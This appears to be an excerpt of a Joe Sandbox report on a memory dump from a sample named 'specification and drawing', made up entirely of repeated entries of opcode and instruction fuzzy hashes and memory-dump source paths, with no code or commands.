                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                          • Instruction ID: 63730596f3cba89ebd6c74d6837000b9fd998189194b510edf3ade2c71a7dde4
                                                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                          • Instruction Fuzzy Hash: F0516A75A00215CFDB19CF98C480AAEF7B2FF84710F2881A9D955E7355D770AE42CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c7b6ad98e05fe8ccd2de470f94d309ed5620782c54c3d640e8ebb2dfe7b52f4a
                                                                                                          • Instruction ID: c1284cc948c98312646fd858139c8f6d0cf15d6f2a58125f47fa55fe33832010
                                                                                                          • Opcode Fuzzy Hash: c7b6ad98e05fe8ccd2de470f94d309ed5620782c54c3d640e8ebb2dfe7b52f4a
                                                                                                          • Instruction Fuzzy Hash: A051E5B09006169BDB398B28CC40BECBBB2EF15314F1482E9E5A9A73D1DB359991CF40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3c4973f1baa9bd8149f6622f95bf55eda24f4142df7e03a2a71e26adbbfc0627
                                                                                                          • Instruction ID: acf8059aae67f051b1650e22c19311bc23e3083d19f5ccf47d35c27652386bed
                                                                                                          • Opcode Fuzzy Hash: 3c4973f1baa9bd8149f6622f95bf55eda24f4142df7e03a2a71e26adbbfc0627
                                                                                                          • Instruction Fuzzy Hash: 70417F75A0132CDBDF26DF68C980BEEB7B4AF45B40F4100A9E948AB245D7749E80CF91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 911581c574d6e59d80c8a7ec073a018676dedb08f6265407c5f1f81756c7fa47
                                                                                                          • Instruction ID: d3a9370098eeb89be1a6c21a0ce7986ff934a18a3c4bbf247b3974e99778d999
                                                                                                          • Opcode Fuzzy Hash: 911581c574d6e59d80c8a7ec073a018676dedb08f6265407c5f1f81756c7fa47
                                                                                                          • Instruction Fuzzy Hash: 4241C375A40319DFEB25DF29CC80BAEB7A9AB54B04F0004ADF9859B285D7B0ED44CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                          • Instruction ID: daddd157d8486d284992a78255ca674315588c97d1516177059c1e28c8b26e3d
                                                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                          • Instruction Fuzzy Hash: F841B775B10205ABEB19FF99CD84AAFBBBAAF88744F648069E504D7341D770DD01CB60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c867c7bd75535207fea656f0463c66d65190fde8d802d1745b2066490bf382f1
                                                                                                          • Instruction ID: d1713d999af9b38d77dbdbcb52aff10535c1fc327a9ef9d4f650aed748799712
                                                                                                          • Opcode Fuzzy Hash: c867c7bd75535207fea656f0463c66d65190fde8d802d1745b2066490bf382f1
                                                                                                          • Instruction Fuzzy Hash: F741C274600702DFE325CF28C880A6AB7F9FF49714B108A6DE58686A54E730E845CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d996a9f5857ef4ae4af5291bbade1176f2694ee18ecbd4390b8dc1ae9648bf16
                                                                                                          • Instruction ID: 81fb24b04c1a7ebb2b8a23fdf09f5a43aceb440fc82f7610c3321c08437b1e26
                                                                                                          • Opcode Fuzzy Hash: d996a9f5857ef4ae4af5291bbade1176f2694ee18ecbd4390b8dc1ae9648bf16
                                                                                                          • Instruction Fuzzy Hash: 0741DD32A01215CFDF29DF6DC898BED7BF0BF58320F1441A9D462AB291DB349940CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 87d8d9be69360adb27f4d5829c21e0be2ea372295e016a266c44fa14931b206d
                                                                                                          • Instruction ID: 77d19fb7ce20f3fa081d3b05d7ed894be53fa12b0d8b4fdf1626e6f7dc1bfe6a
                                                                                                          • Opcode Fuzzy Hash: 87d8d9be69360adb27f4d5829c21e0be2ea372295e016a266c44fa14931b206d
                                                                                                          • Instruction Fuzzy Hash: DA41F332900216CBDB289F4CC8C0A9EBBB1FB98B14F14C02ED9129B656D735D842CF94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 954b2627fe524da4bd94dd61167845b013d155df75ac1a26d2d4a9d7e3435f41
                                                                                                          • Instruction ID: 06a0770a64bab20386d1d48d860dd9875819ce4c35f161b4d4bb559e7bdb102e
                                                                                                          • Opcode Fuzzy Hash: 954b2627fe524da4bd94dd61167845b013d155df75ac1a26d2d4a9d7e3435f41
                                                                                                          • Instruction Fuzzy Hash: E9416A315087069ED712DF69C880AABF7E8EF88B54F44492BF980D7260E731DE048B97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                          • Instruction ID: ac2013c91da1b622c8b36a5147c8ad37fbb83613b76fb5983b7c3ea6ed1a6221
                                                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                          • Instruction Fuzzy Hash: 9D412931B08213DBDB29DE5884807FEFB71EB50764F15807AF9858B244E7368D80CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6bcadebd5c0b960ecf374cf0a99e889e30667adc01172adeb74adfbe8edd88cd
                                                                                                          • Instruction ID: 525b7b4b905876c0ed4a6d9bdd99b11f28c43d3236a71c4c9ea6a2d58d505d36
                                                                                                          • Opcode Fuzzy Hash: 6bcadebd5c0b960ecf374cf0a99e889e30667adc01172adeb74adfbe8edd88cd
                                                                                                          • Instruction Fuzzy Hash: BA415475600701EFD725CF18C840B6ABBE4EF58B14F248A6EE8898B255E771E942CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                          • Instruction ID: e5ac39a8cde0b61f2643facbc2f3d86d3becced98c273eb70d7aba7d4e068181
                                                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                          • Instruction Fuzzy Hash: 6A415C75A00705EFDB24CF98C981AAABBF5FF08700B1049ADE696D7656D330EA44CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9601e192888acbcb38ff0c42d541551b5cb17f2813c085c78002e3099e5623e5
                                                                                                          • Instruction ID: cb40cd13c0cbd32f133ccfa3ebfd27bea502d146ecb06816d10bdd8bdd564da1
                                                                                                          • Opcode Fuzzy Hash: 9601e192888acbcb38ff0c42d541551b5cb17f2813c085c78002e3099e5623e5
                                                                                                          • Instruction Fuzzy Hash: 7C41BFB1501705CFC72AEF28C980AADB7F1FF58B14F1482ADC4969BAA1DB309941CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5fde310f05c510ee84d7e8d2daf702d7755ccdc41bb69ad2e465b0a88ffdf840
                                                                                                          • Instruction ID: 5d604c50908903ed0199f10982337347f9e9f449fa7cb49e9b8baed40e9c4937
                                                                                                          • Opcode Fuzzy Hash: 5fde310f05c510ee84d7e8d2daf702d7755ccdc41bb69ad2e465b0a88ffdf840
                                                                                                          • Instruction Fuzzy Hash: D031BCB2A04349DFEB16CF58C141B99BBF0FB08718F2085AED119EB651D3329902CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ec013ff44fab63a9993d5a092fe1f81803f95472f646303c6c3a8c8b830d0443
                                                                                                          • Instruction ID: 92ed2f6473372243d7280c8f6fb11a20b07f1284a14c9a2851c33b86e266ba07
                                                                                                          • Opcode Fuzzy Hash: ec013ff44fab63a9993d5a092fe1f81803f95472f646303c6c3a8c8b830d0443
                                                                                                          • Instruction Fuzzy Hash: 35418E719083019FD764DF29C885B9BBBE8FF88654F004A2EF6A8D7291D7709944CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ebdc1e1b9d0cc2631be882f154bbcaaee1f23ccf0c921a2470b2a16cab29cc3f
                                                                                                          • Instruction ID: f8d850d57eb22aa111e0d8e5523b475f6719fbe01b6b2705235eef7055c3e469
                                                                                                          • Opcode Fuzzy Hash: ebdc1e1b9d0cc2631be882f154bbcaaee1f23ccf0c921a2470b2a16cab29cc3f
                                                                                                          • Instruction Fuzzy Hash: AA41E4725047459FC329DF69C840BAAB7E5FFC8B00F14061DFA958B680E730D904C7A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69a2818d33fdb7cb7f9e66c244e0070966d83e1533bd1621fed77c83c87692ca
                                                                                                          • Instruction ID: 7bf1c97517cbe800bbf5f2c98c90805505c4c0c675ea954c1b4b416b828c429b
                                                                                                          • Opcode Fuzzy Hash: 69a2818d33fdb7cb7f9e66c244e0070966d83e1533bd1621fed77c83c87692ca
                                                                                                          • Instruction Fuzzy Hash: 7E41CE702003128BD725CF28D8A4BAEBBE9FF90B60F14456DEA95CB291DB30D841CF91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                          • Instruction ID: f63bf91014e293a395c3ef75f9eb370ebedec228faa747569c4f58fa9b44c534
                                                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                          • Instruction Fuzzy Hash: 0F31F231A04345ABDB229B6CCC44BDFBFE9AF54750F0481A9F899D7356CB749884CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fe205ab4cc1f26f9da1f87b4cd8e8c6d81870bf8f1312e9df90f064accd50e8a
                                                                                                          • Instruction ID: 47439f9f667c5096efbb93700607d03ffff8b77468f807458f7122cb67870ad9
                                                                                                          • Opcode Fuzzy Hash: fe205ab4cc1f26f9da1f87b4cd8e8c6d81870bf8f1312e9df90f064accd50e8a
                                                                                                          • Instruction Fuzzy Hash: B341AD71200B459FD72ACF28C891BDA7BE5BB59714F01852EF6998B290D774E810CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                          • Instruction ID: ae6c46c32f65a240285cc45de59baa649821040ebc5f16cc2e73ec7b7af813fd
                                                                                                          • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                          • Instruction Fuzzy Hash: BC31E672505325AFD71ADB14CC01EABBBACEB54660F05492DF95187250E771EC14CBA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 62cd1489a2f94fac1064c8199035ed1ffa7526024ddac71b8d5cf006a82573ad
                                                                                                          • Instruction ID: a3d1da16a51b81bd741cea083c37a48afc289d0510e1bef428599e66e0c06904
                                                                                                          • Opcode Fuzzy Hash: 62cd1489a2f94fac1064c8199035ed1ffa7526024ddac71b8d5cf006a82573ad
                                                                                                          • Instruction Fuzzy Hash: 5E31B2712027869BF32F575DC948FA57BD8BB80B44F1D00A0AB859B6DADB28D841C625
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0365785ad13340b867b9bdc21f35700e1570eb3a8f6446ea0ed4c30877ec4f35
                                                                                                          • Instruction ID: 7bb9e445b0ca5cafd94c96101ea93fb9192668e67e42c1192e1a6194076a5da0
                                                                                                          • Opcode Fuzzy Hash: 0365785ad13340b867b9bdc21f35700e1570eb3a8f6446ea0ed4c30877ec4f35
                                                                                                          • Instruction Fuzzy Hash: D231A675A0025AEBDB19DF98CC80FAEB7B6FB48744F4581A9E900AB244D770ED41CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8b783de2f4a5895f994a90b1059678a9e5fd9db86937fc9c7341e98d27a15a4c
                                                                                                          • Instruction ID: 496721e3b41c4bfe99826a09494d4a14248c253d6a9564a597cc08bcac3f9551
                                                                                                          • Opcode Fuzzy Hash: 8b783de2f4a5895f994a90b1059678a9e5fd9db86937fc9c7341e98d27a15a4c
                                                                                                          • Instruction Fuzzy Hash: 89316176A4112DABCF25DF54DC84BDEBBBAAB9C310F1040A5E908A7250DB31DE91CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a85e88d5a4e35845490d084f02620851f4a7f00a42b7be31e4bb69836f567b29
                                                                                                          • Instruction ID: fc42b42f1dbd225f861e8b894d45216f21d44ea2ebd284a50bd8cc899ebd5a50
                                                                                                          • Opcode Fuzzy Hash: a85e88d5a4e35845490d084f02620851f4a7f00a42b7be31e4bb69836f567b29
                                                                                                          • Instruction Fuzzy Hash: 2831A172E0021DAFDB21DFAACC44AAFBBF9EF48750F114465E956E7250D3709E008BA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 68e9ce2e383f4c0c19e82836d5ec149060281a1db666fb826d8973dbbce70baa
                                                                                                          • Instruction ID: 97fc947c4558fb999a290ccecbab148e78fdb53406370f35cdb274b7ed3ccf45
                                                                                                          • Opcode Fuzzy Hash: 68e9ce2e383f4c0c19e82836d5ec149060281a1db666fb826d8973dbbce70baa
                                                                                                          • Instruction Fuzzy Hash: 14310571A00216AFDB1AAF99C880BAEB7B9AF84714F048069E502DB352DB30DC01CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8b64c44a6e8bcad95a67fca82cc51b6bd7fe2c8dc73aefc0cc481a3938ccc245
                                                                                                          • Instruction ID: 0a564d6fef7368ba6816ef0406c7cf554f948f599aab9fac7619c5776de022b3
                                                                                                          • Opcode Fuzzy Hash: 8b64c44a6e8bcad95a67fca82cc51b6bd7fe2c8dc73aefc0cc481a3938ccc245
                                                                                                          • Instruction Fuzzy Hash: 0F31C476A04616DBC712DF688880AAFBBE5AF94A50F01852DFDD597214DB30DC05CFE1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2b7bfe50671810207e842883e1587040ba8da6795bde7f768b4abff4ea05f3c5
                                                                                                          • Instruction ID: b4fc84ab0d6850e0a52f7fc73d16c981718c8ba0a99a3ccbc9ef812ff43c1830
                                                                                                          • Opcode Fuzzy Hash: 2b7bfe50671810207e842883e1587040ba8da6795bde7f768b4abff4ea05f3c5
                                                                                                          • Instruction Fuzzy Hash: 6C31C2715043118FE764CF19C840B6ABBE5FF98B00F054A6EF98497350D7B5E844CB95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                          • Instruction ID: 55a77b701c60ac93af82688810628e3babc34d57e11a28415c44762940eef010
                                                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                          • Instruction Fuzzy Hash: C6312AB2B04B01EFD765CF69DD41B57BBF8BB48A50F14096DA69AC3A50E730E900CB60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cbfc33f5c8b78708087ebaf6ecf5901cfc3e6b3a3252fe01053b9d7049f62d6b
                                                                                                          • Instruction ID: 5d097999a57bb0ec832fee66cea6d749d22e2f30ee69f6e72e68bdb60a80dbd6
                                                                                                          • Opcode Fuzzy Hash: cbfc33f5c8b78708087ebaf6ecf5901cfc3e6b3a3252fe01053b9d7049f62d6b
                                                                                                          • Instruction Fuzzy Hash: 1131EDB5506341CFCB19DF19C5809AABBF9FF89614F444AAEE4889B305D332D961CB82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 51a3e46f46db1d120cf0eef2466e19154dbc27ec6fe0bfce8b866bb62a9e6d4a
                                                                                                          • Instruction ID: d12afa390cb433db154ab123a81b2cd83961903f1c37b814c6eaee3c5423c4d4
                                                                                                          • Opcode Fuzzy Hash: 51a3e46f46db1d120cf0eef2466e19154dbc27ec6fe0bfce8b866bb62a9e6d4a
                                                                                                          • Instruction Fuzzy Hash: 7B31D671B003059FD728EFBAC985A6E77F9AB94304F008529D586D7254DB30EA41CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                          • Instruction ID: 7717847a144bd21ec54219fe3453de25713e94cb343927eac7963c4ede0bfd29
                                                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                          • Instruction Fuzzy Hash: 0F210672E1525AAADB159BB98851BEFFBB5AF14740F058035DE55EB340E370D90087A0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f5b934a7346820704224e90291cb92a84e106dd97b02a5f5c8d576f0e38fdb81
                                                                                                          • Instruction ID: 8de8f3e8ac183e750ad337020f1662223ff0105d859e4aff6ea238c33412b9c7
                                                                                                          • Opcode Fuzzy Hash: f5b934a7346820704224e90291cb92a84e106dd97b02a5f5c8d576f0e38fdb81
                                                                                                          • Instruction Fuzzy Hash: F7315BB15003018BDF29AF68DC85BA9B7B4AF50308F4486B9DD859B346EB34D981CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                          • Instruction ID: c2ac4f6f6583e1b2f5906a39cc99fb821f59077c983d4f0dcce3c219897ccaf6
                                                                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                          • Instruction Fuzzy Hash: FB21FB36A00657A6CB19AF95C800FFBBBB5EF90714F40841AFA968B791E734D950C7E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
